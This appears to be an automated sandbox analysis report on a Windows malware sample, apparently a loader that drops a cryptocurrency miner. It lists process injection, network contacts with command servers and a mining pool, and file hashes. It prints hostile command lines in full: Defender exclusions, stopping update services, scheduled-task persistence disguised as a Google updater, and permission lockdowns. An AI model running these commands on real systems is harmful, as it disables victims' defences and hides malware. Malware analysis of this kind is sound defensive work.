Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 3752 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 3456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3100 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe
PID 1432 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1432 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe
PID 1432 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 1432 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3444 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4048 wrote to memory of 4812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 4812 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 3924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 3924 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4048 wrote to memory of 2056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4116 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4116 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe"

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
NL 194.180.49.153:80 194.180.49.153 tcp
US 8.8.8.8:53 208.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 153.49.180.194.in-addr.arpa udp
SG 128.199.192.86:81 tcp
US 8.8.8.8:53 86.192.199.128.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
US 206.189.229.43:80 206.189.229.43 tcp
US 8.8.8.8:53 43.229.189.206.in-addr.arpa udp
US 8.8.8.8:53 38.148.119.40.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp

Files

memory/3752-122-0x0000000000CF0000-0x0000000001791000-memory.dmp

memory/3752-121-0x00000000017F0000-0x00000000017F1000-memory.dmp

memory/3752-124-0x0000000000CF0000-0x0000000001791000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/3752-134-0x0000000000CF0000-0x0000000001791000-memory.dmp

memory/1432-135-0x0000000000600000-0x0000000000601000-memory.dmp

memory/1432-136-0x0000000000980000-0x0000000001421000-memory.dmp

memory/1432-138-0x0000000000980000-0x0000000001421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\148472871111

MD5 08bca14f9665e531d134ede3f5e67903
SHA1 9293b10128d06c63b519b0c116b11f1884477578
SHA256 a00bad50528a4c4b717ada6f76c38546f54bf64acd809d6265282e3f279032ba
SHA512 1a362d5ee037f21e4a284d7cf7ed829e055a87164432c570fbef61dab1965daca98f4a2b07ff47327ddbffc375fe182a03ee7574d06dd428cf8eae2c10c1c79b

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

memory/3444-166-0x00000000008E0000-0x0000000000B26000-memory.dmp

memory/3444-167-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-168-0x0000000005320000-0x00000000053BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/4804-181-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-183-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/4804-182-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/1432-184-0x0000000000980000-0x0000000001421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/4804-198-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4152-199-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4804-200-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-201-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-202-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-203-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-204-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/3444-205-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-207-0x00000000055B0000-0x00000000055C0000-memory.dmp

memory/3444-206-0x0000000005290000-0x00000000052AC000-memory.dmp

memory/3444-208-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-209-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-211-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-213-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-215-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-217-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-219-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-221-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-223-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-225-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-227-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-229-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/3444-231-0x0000000005290000-0x00000000052A5000-memory.dmp

memory/4804-232-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/3444-233-0x00000000052E0000-0x00000000052E1000-memory.dmp

memory/4132-234-0x0000000000400000-0x000000000045A000-memory.dmp

